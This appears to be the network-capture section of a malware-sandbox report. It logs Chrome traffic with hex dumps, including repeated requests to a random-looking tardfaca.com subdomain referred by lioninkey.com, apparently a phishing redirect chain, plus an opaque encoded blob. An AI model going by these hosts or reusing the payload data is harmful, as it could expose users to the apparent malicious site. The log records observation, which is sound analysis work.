                                                                                                                                                                                                                                                                                      2024-10-24 22:05:59 UTC1205INData Raw: 69 59 64 4c 59 57 47 44 5a 59 68 36 69 47 32 4f 64 6c 65 46 62 70 4e 57 55 31 74 34 6b 46 68 76 66 6e 36 52 63 58 36 6d 69 48 53 6a 66 6f 4a 74 71 6e 65 6e 68 6f 47 50 67 36 47 33 72 72 43 59 75 37 4b 30 73 4c 53 70 66 61 32 37 71 37 62 46 66 73 57 51 74 36 75 45 71 61 32 72 68 38 50 48 77 62 44 46 31 74 4b 55 72 5a 4b 30 6b 72 57 6c 74 4e 47 2f 75 64 37 45 33 4b 33 43 77 71 44 45 78 72 65 35 75 4f 37 58 70 73 37 63 38 74 54 76 78 64 4b 76 39 38 2f 46 2b 76 33 4e 79 4c 6e 74 79 75 2f 64 30 50 62 58 33 74 6a 37 32 65 6e 4e 2f 63 72 37 7a 66 37 4e 79 2b 7a 2b 35 77 58 52 32 65 50 73 2b 74 73 66 2b 68 4c 75 4a 42 30 42 35 66 63 41 35 77 6a 6a 4a 66 6f 41 35 77 72 6e 49 77 6b 65 38 67 38 57 4e 51 54 32 2b 76 66 31 4c 52 2f 38 50 66 6b 61 45 44 77 44 51 7a 34
                                                                                                                                                                                                                                                                                      Data Ascii: iYdLYWGDZYh6iG2OdleFbpNWU1t4kFhvfn6RcX6miHSjfoJtqnenhoGPg6G3rrCYu7K0sLSpfa27q7bFfsWQt6uEqa2rh8PHwbDF1tKUrZK0krWltNG/ud7E3K3CwqDExre5uO7Xps7c8tTvxdKv98/F+v3NyLntyu/d0PbX3tj72enN/cr7zf7Ny+z+5wXR2ePs+tsf+hLuJB0B5fcA5wjjJfoA5wrnIwke8g8WNQT2+vf1LR/8PfkaEDwDQz4
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:59 UTC1369INData Raw: 50 48 7a 36 4e 66 7a 30 66 44 30 38 4e 58 34 38 76 6a 38 42 51 48 30 47 52 49 71 41 68 6f 4d 49 76 37 35 36 69 30 45 4e 4f 6f 6e 43 41 49 46 45 79 67 48 4f 77 59 57 43 67 41 53 46 50 30 56 48 42 59 6e 4a 44 38 61 4a 45 63 57 48 51 59 63 54 53 6c 45 4b 53 49 6a 52 78 51 70 4d 6a 59 54 55 6a 67 72 4e 46 42 50 51 31 4d 58 4f 44 45 78 4f 6b 5a 61 4a 44 78 46 4a 7a 68 50 51 79 70 72 51 31 46 6e 57 55 4e 54 62 55 6c 4b 55 48 39 30 54 6d 39 51 55 49 5a 32 55 45 64 32 57 59 78 56 59 32 69 42 58 6c 32 41 67 6f 36 57 62 6b 35 78 61 6e 4e 72 62 4a 46 36 6b 46 68 58 6b 47 2b 4f 6c 49 43 5a 65 59 43 46 68 61 5a 74 69 4b 43 72 67 59 71 4d 6c 4b 65 52 71 4a 47 53 6a 4a 71 37 6c 4a 69 76 75 35 32 65 75 49 43 5a 6e 38 69 67 77 71 4b 39 6f 5a 36 65 71 5a 7a 49 71 5a 2b 63
                                                                                                                                                                                                                                                                                      Data Ascii: PHz6Nfz0fD08NX48vj8BQH0GRIqAhoMIv756i0ENOonCAIFEygHOwYWCgASFP0VHBYnJD8aJEcWHQYcTSlEKSIjRxQpMjYTUjgrNFBPQ1MXODExOkZaJDxFJzhPQyprQ1FnWUNTbUlKUH90Tm9QUIZ2UEd2WYxVY2iBXl2Ago6Wbk5xanNrbJF6kFhXkG+OlICZeYCFhaZtiKCrgYqMlKeRqJGSjJq7lJivu52euICZn8igwqK9oZ6eqZzIqZ+c
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:59 UTC1369INData Raw: 2f 79 30 77 44 70 38 64 38 5a 38 39 73 63 46 42 63 53 49 50 50 64 4a 75 73 67 2b 69 6f 51 37 79 30 49 46 54 67 41 4d 67 30 46 44 44 34 54 47 54 6f 39 45 68 34 56 50 52 6f 52 4d 6b 55 63 53 30 5a 4e 49 53 6f 6f 55 55 59 4e 54 53 45 54 56 53 31 42 4d 68 67 6c 52 6b 6f 34 4f 7a 41 63 4d 6c 39 68 48 69 38 66 51 7a 56 6e 61 53 6f 36 4c 32 4a 4d 4f 32 46 6d 52 44 5a 30 54 45 63 33 61 79 35 6c 4e 7a 31 33 64 6e 74 77 5a 55 46 66 55 57 64 45 68 31 2b 49 54 49 78 4f 53 47 64 6e 68 47 78 78 6c 56 64 76 64 70 5a 77 64 33 4b 62 63 31 68 74 6b 6f 36 44 70 6f 4e 65 59 36 61 43 67 32 5a 72 65 70 6d 6f 70 4c 42 78 73 6e 2b 30 73 62 42 79 74 62 61 62 6c 62 65 51 65 62 66 44 75 37 47 65 66 4c 4b 54 6d 72 2b 30 76 61 65 57 6a 59 71 4c 30 63 44 4e 71 73 6e 4f 77 4d 4c 62 30
                                                                                                                                                                                                                                                                                      Data Ascii: /y0wDp8d8Z89scFBcSIPPdJusg+ioQ7y0IFTgAMg0FDD4TGTo9Eh4VPRoRMkUcS0ZNISooUUYNTSETVS1BMhglRko4OzAcMl9hHi8fQzVnaSo6L2JMO2FmRDZ0TEc3ay5lNz13dntwZUFfUWdEh1+ITIxOSGdnhGxxlVdvdpZwd3Kbc1htko6DpoNeY6aCg2ZrepmopLBxsn+0sbBytbablbeQebfDu7GefLKTmr+0vaeWjYqL0cDNqsnOwMLb0
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:59 UTC601INData Raw: 65 2f 76 6f 62 44 2b 51 55 4a 75 6b 4c 36 79 7a 72 41 69 59 6d 47 79 6a 73 4d 44 45 57 4c 44 67 7a 4d 50 4d 34 49 44 67 79 38 77 46 41 51 55 5a 42 2b 54 4d 43 49 42 35 4b 52 54 63 34 44 51 51 6d 49 68 46 4d 4b 6a 4d 56 56 6a 77 56 50 56 6c 49 54 45 6b 71 57 6b 78 6a 57 6c 4a 43 49 79 70 70 51 79 70 6f 58 46 68 69 61 56 52 6b 61 33 56 59 59 44 52 7a 58 48 4a 48 65 57 68 65 66 58 56 43 56 6d 56 47 68 49 52 78 66 32 4a 73 59 34 36 48 67 57 36 49 61 6e 79 52 69 34 47 5a 55 70 69 57 64 47 65 57 68 36 42 67 6d 32 47 6c 64 36 57 49 70 57 4b 71 71 4a 31 6f 71 34 4f 67 61 36 78 38 67 71 71 30 64 59 2b 57 74 48 69 79 68 37 4b 34 6d 35 43 31 76 71 4f 44 77 6f 53 31 70 4d 48 46 6f 73 75 4f 6a 36 75 68 6e 73 44 56 71 64 65 72 30 5a 50 5a 6d 74 32 59 70 70 58 5a 72 2b
                                                                                                                                                                                                                                                                                      Data Ascii: e/vobD+QUJukL6yzrAiYmGyjsMDEWLDgzMPM4IDgy8wFAQUZB+TMCIB5KRTc4DQQmIhFMKjMVVjwVPVlITEkqWkxjWlJCIyppQypoXFhiaVRka3VYYDRzXHJHeWhefXVCVmVGhIRxf2JsY46HgW6IanyRi4GZUpiWdGeWh6Bgm2Gld6WIpWKqqJ1oq4Oga6x8gqq0dY+WtHiyh7K4m5C1vqODwoS1pMHFosuOj6uhnsDVqder0ZPZmt2YppXZr+


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      29192.168.2.1649740104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:59 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:59 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:59 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                      Content-Length: 7
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cf-chl-out: Y1JTP17OIgEMbiXDKPGYRSTZiMBlh1VVC0U=$SUwJ4dho+hONmpyO
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d4580c8403ac6-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:59 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                      Data Ascii: invalid


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      30192.168.2.1649742172.67.222.464436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:00 UTC676OUTGET /36974546827917592623PukShACTIFUUXHNFZJZLOOOMQZMXHGUSGNHIYBAXZDFLHJUFPX HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://fkmd.lioninkey.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://fkmd.lioninkey.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:01 UTC873INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:01 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jhIlFLK004bM6UJnH3vBAzeCQnZul9eC7f4kcsC%2FMgCCwzYcfbI%2F8gw5dvG0lPMpu74PSCTCkMprqxPygyECGoDr%2FMDUF6BNXMQLXaK5KG2sZLIMOfj6T7X83Ev4%2BKBpsbCTlwS7rzMNqMYAzA2Rm425NTa4RPS1DpPoLhtsNOT6JT2CrNIMUKy06NxwxHRIJdGHF9UfHsoAmVo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d45857be33458-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1254&delivery_rate=2341147&cwnd=251&unsent_bytes=0&cid=b52024259cbc959b&ts=802&x=0"
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:01 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 11
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      31192.168.2.1649746172.67.222.464436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:02 UTC466OUTGET /36974546827917592623PukShACTIFUUXHNFZJZLOOOMQZMXHGUSGNHIYBAXZDFLHJUFPX HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:03 UTC881INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:03 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpfjomAT5QLRPoMZD%2B3lvA5A5XZOvS13loIUh3gxk9A8F9S%2BXBT%2Fam0UDz3RaHZ90%2Bu2Ki5kYo1qh1%2BU%2BB7GRQZIomONUFzfYQ2WVDVCllott13RGyXm%2B8kW0v%2FbzNuVrng3aANrm6anuIDORQnwscMKLcIirVn15dBTTppFAclRkB358G88BpFvxuBVCY4RtNN4Z3eaQGRzhBo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d4592c9f02c9e-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1044&delivery_rate=1841068&cwnd=251&unsent_bytes=0&cid=8b703f7ef381c994&ts=805&x=0"
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:03 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 11
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      32192.168.2.164975618.66.102.744436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:03 UTC631OUTGET /html/assets/img_community-logo.svg HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: community.sephora.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://www.sephora.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: AKA_A2=A
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:03 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                      Content-Length: 1651
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 04 Aug 2020 15:20:49 GMT
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 21:08:09 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: max-age=7200
                                                                                                                                                                                                                                                                                      ETag: W/"1651-1596554449217"
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                      Via: 1.1 21c2c1b3872c539a34b64bcf45f4054c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA56-P2
                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: kITKYz-1IKRvuCxFqWoiGbXcvqwZUrxgzOJMoIq55BNlpBxNNbWdeA==
                                                                                                                                                                                                                                                                                      Age: 3474
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:03 UTC1651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 34 33 35 2e 32 20 31 30 30 30 20 31 32 39 2e 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 64 3d 22 4d 38 31 32 2e 36 20 34 37 32 2e 31 63 2d 32 2e 32 2d 32 30 2e 31 2d 32 37 2e 34 2d 31 38 2e 36 2d 33 32 2e 32 2d 31 38 2e 36 68 2d 31 30 2e 31 56 34 39 35 63 34 2e 33 2e 32 20 37 2e 36 2e 32 20 31 31 2e 39 2e 32 20 35 2e 31 20 30 20 33 33 20 2e 37 20 33 30 2e 34 2d 32 33 2e 31 7a 4d 36 33 31 2e 34 20 34 35 32 2e 39 63 2d 32 38 2e 37 20 30 2d 34 34 2e 39 20 32 31 2e 32 2d 34 34 2e 39 20 34 37 2e 31 20 30 20 32 36 2e 31 20 31 36 2e 32 20 34 37 2e 31 20 34 34 2e 39 20 34 37 2e 31 73 34 34 2e
                                                                                                                                                                                                                                                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 435.2 1000 129.6"><path fill="none" d="M812.6 472.1c-2.2-20.1-27.4-18.6-32.2-18.6h-10.1V495c4.3.2 7.6.2 11.9.2 5.1 0 33 .7 30.4-23.1zM631.4 452.9c-28.7 0-44.9 21.2-44.9 47.1 0 26.1 16.2 47.1 44.9 47.1s44.


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      33192.168.2.164975718.66.102.1064436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:04 UTC397OUTGET /html/assets/img_community-logo.svg HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: community.sephora.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: AKA_A2=A
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:05 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                      Content-Length: 1651
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 04 Aug 2020 15:20:49 GMT
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 21:08:09 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: max-age=7200
                                                                                                                                                                                                                                                                                      ETag: W/"1651-1596554449217"
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                      Via: 1.1 2af4ee189e50805a67bd62bbd51ad0dc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA56-P2
                                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: UIn8DXdyYhvdTjqqYYe8bMYDEcs-GaeUFXwADyjwFlvrXXY3tYdVxA==
                                                                                                                                                                                                                                                                                      Age: 3476
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:05 UTC1651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 34 33 35 2e 32 20 31 30 30 30 20 31 32 39 2e 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 64 3d 22 4d 38 31 32 2e 36 20 34 37 32 2e 31 63 2d 32 2e 32 2d 32 30 2e 31 2d 32 37 2e 34 2d 31 38 2e 36 2d 33 32 2e 32 2d 31 38 2e 36 68 2d 31 30 2e 31 56 34 39 35 63 34 2e 33 2e 32 20 37 2e 36 2e 32 20 31 31 2e 39 2e 32 20 35 2e 31 20 30 20 33 33 20 2e 37 20 33 30 2e 34 2d 32 33 2e 31 7a 4d 36 33 31 2e 34 20 34 35 32 2e 39 63 2d 32 38 2e 37 20 30 2d 34 34 2e 39 20 32 31 2e 32 2d 34 34 2e 39 20 34 37 2e 31 20 30 20 32 36 2e 31 20 31 36 2e 32 20 34 37 2e 31 20 34 34 2e 39 20 34 37 2e 31 73 34 34 2e
                                                                                                                                                                                                                                                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 435.2 1000 129.6"><path fill="none" d="M812.6 472.1c-2.2-20.1-27.4-18.6-32.2-18.6h-10.1V495c4.3.2 7.6.2 11.9.2 5.1 0 33 .7 30.4-23.1zM631.4 452.9c-28.7 0-44.9 21.2-44.9 47.1 0 26.1 16.2 47.1 44.9 47.1s44.


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      34192.168.2.1649765172.202.163.200443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:30 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+7WnBV4zh2d+Rfg&MD=NKxfPlDA HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:30 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                                      MS-CorrelationId: 19c8a838-005e-485e-9f48-0989288f294b
                                                                                                                                                                                                                                                                                      MS-RequestId: 9454f2c8-ddea-4805-9b8e-74f85d1d7baf
                                                                                                                                                                                                                                                                                      MS-CV: W7VS7c2UVE69c/0v.0
                                                                                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:30 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Content-Length: 30005
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:30 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
